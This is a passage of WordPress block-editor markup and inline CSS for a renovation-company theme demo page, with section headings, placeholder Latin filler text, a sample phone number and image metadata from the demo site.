undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3bc99896-2b5b-42fe-afa6-971674d2cb49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-large is-style-default\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"0a4cceec-d53f-4db2-812f-a15c82e4fe52\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a062bb15-a78a-4350-be3a-3739c7a2bc28\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a062bb15-a78a-4350-be3a-3739c7a2bc28\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"5b1cfe4b-2df1-4650-86cc-8b60a879c843\"} -->\n<style type=\"text/css\"> .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5b1cfe4b-2df1-4650-86cc-8b60a879c843\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8b1f5966-b2c5-409f-a2d8-81f5483a9822\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8b1f5966-b2c5-409f-a2d8-81f5483a9822\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Our<br>Renovation Group of<br>Company</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"89bc752d-a3ed-4365-a51f-9d4c795749b9\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-89bc752d-a3ed-4365-a51f-9d4c795749b9 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"a5f17d88-6d43-4641-a46c-eadaddd85344\"} -->\n<style type=\"text/css\"> .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a5f17d88-6d43-4641-a46c-eadaddd85344 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"a99ce411-1f70-439d-8529-2b17e168518c\"} -->\n<style type=\"text/css\"> .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a99ce411-1f70-439d-8529-2b17e168518c\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"8ed6f8b8-f938-4dc9-8385-38574158bc9a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">123 456 7890</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493\"} -->\n<style type=\"text/css\"> .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block 